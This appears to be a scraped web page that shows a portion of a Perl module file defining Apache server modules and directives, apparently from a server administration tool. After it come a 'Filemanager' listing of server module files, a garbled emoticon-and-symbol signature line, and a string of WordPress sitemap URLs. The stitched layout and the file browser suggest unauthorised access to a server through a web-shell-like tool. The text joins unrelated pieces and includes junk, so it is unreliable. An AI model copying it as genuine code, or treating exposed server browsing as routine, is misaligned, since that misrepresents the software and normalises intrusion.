											"values" => [ "none", "optional", "require", "optional_no_ca" ] },
                                   { option =>"SSLProxyVerifyDepth", 		"context" => [ "SSL", "Server", "Virtual", "Directory" ] },
                                   { option =>"SSLRandomSeed", 			"context" => [ "SSL", "Server" ] },
                                   { option =>"SSLRequire", 			"context" => [ "SSL", "Directory" ] },
                                   { option =>"SSLRequireSSL", 			"context" => [ "SSL", "Directory" ] },
                                   { option =>"SSLSessionCache", 		"context" => [ "SSL", "Server" ] },
                                   { option =>"SSLSessionCacheTimeout", 	"context" => [ "SSL", "Server", "Virtual" ] },
                                   { option =>"SSLVerifyClient", 		"context" => [ "SSL", "Server", "Virtual", "Directory" ],
											"values" => [ "none", "optional", "require", "optional_no_ca" ] },
                                   { option =>"SSLVerifyDepth", 		"context" => [ "SSL", "Server", "Virtual", "Directory" ] }
                                ]
    },
    'unique_id' => {
                    summary   => __("Provides an environment variable with a unique identifier for each request"),
                    packages  => [],
                    default   => 0,
                    position  => 460
    },
    'usertrack' => {
                    summary   => __("Clickstream logging of user activity on a site"),
                    packages  => [],
                    default   => 0,
                    position  => 470,
                    module    => {
                                  CookieDomain => 'mod_usertrack',
                                  CookieExpires => 'mod_usertrack',
                                  CookieName => 'mod_usertrack',
                                  CookieStyle => 'mod_usertrack',
                                  CookieTracking => 'mod_usertrack'
                    },
                    directives=> [ { option =>"CookieDomain", 	"context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"CookieExpires",  "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"CookieName",     "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"CookieStyle",    "context" => [ "Server", "Virtual", "Directory" ], 
								"values" => [ "Netscape", "Cookie", "Cookie2", "RFC2109", "RFC2965" ] },
                                   { option =>"CookieTracking", "context" => [ "Server", "Virtual", "Directory" ], , "values" => [ "On", "Off" ] },
				]
    },
    'vhost_alias' => {
                    summary   => __("Provides support for dynamically configured mass virtual hosting"),
                    packages  => [],
                    default   => 0,
                    position  => 480,
                    module    => {
                                    VirtualDocumentRoot => 'mod_vhost_alias',
                                    VirtualDocumentRootIP => 'mod_vhost_alias',
                                    VirtualScriptAlias => 'mod_vhost_alias',
                                    VirtualScriptAliasIP => 'mod_vhost_alias'
                    },
                    directives=> [ { option =>"VirtualDocumentRoot", 	"context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"VirtualDocumentRootIP",  "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"VirtualScriptAlias",  "context" => [ "Server", "Virtual", "Directory" ] },
                                   { option =>"VirtualScriptAliasIP",     "context" => [ "Server", "Virtual", "Directory" ] }
				]
    },
    'php5' => {
                    summary   => __("Provides support for PHP5 dynamically generated pages"),
                    packages  => ["apache2-mod_php5"],
                    default   => 0,
                    position  => 490
    },
    'perl' => {
                    summary   => __("Provides support for Perl dynamically generated pages"),
                    packages  => ["apache2-mod_perl"],
                    default   => 0,
                    position  => 500
    },
    'python' => {
                    summary   => __("Provides support for Python dynamically generated pages"),
                    packages  => ["apache2-mod_python"],
                    default   => 0,
                    position  => 510
    },
    'apparmor' => {
                    summary   => __("Provides support for AppArmor subprocess confinement within apache"),
                    packages  => ["mod-apparmor"],
                    default   => 0,
                    position  => 530
     },
    'dav_svn' => {
                    summary   => __("Provides support for subversion"),
                    packages  => ["subversion-server"],
		    requires  => "dav",
                    default   => 0,
                    position  => 540
     },
    'authz_svn' => {
                    summary   => __("Provides support for subversion"),
                    packages  => ["subversion-server"],
		    requires  => "dav_svn",
                    default   => 0,
                    position  => 550
     },
    'session' => {
	             summary => __("Session support"),
        	     packages => [],
	             default => 0,
        	     position => 600
     },
     'session_cookie' => {
	             summary => __("Cookie based session support"),
        	     packages => [],
	             requires => "session",
        	     default => 0,
	             position => 610
     },
     'session_dbd' => {
        	     summary => __("DBD/SQL based session support"),
	             packages => [],
        	     requires => "session",
	             default => 0,
        	     position => 620
     }
);
%selection = (
    TestSel => {
                summary => 'A test selection',
                modules => [ "m1", "m2", "m3" ],
                default => 0
    }
);

Filemanager

Name Type Size Permission Actions
ADMINISTRATOR.pm File 2.82 KB 0644
CaManagement.pm File 219.55 KB 0644
DHCPD.pm File 15.18 KB 0644
DNSD.pm File 8.02 KB 0644
HTTPD.pm File 51.46 KB 0644
HTTPDModules.pm File 44.49 KB 0644
LANGUAGE.pm File 2.19 KB 0644
LdapServer.pm File 63.38 KB 0644
NETWORK.pm File 10.61 KB 0644
TIME.pm File 3.15 KB 0644
USERS.pm File 65.77 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml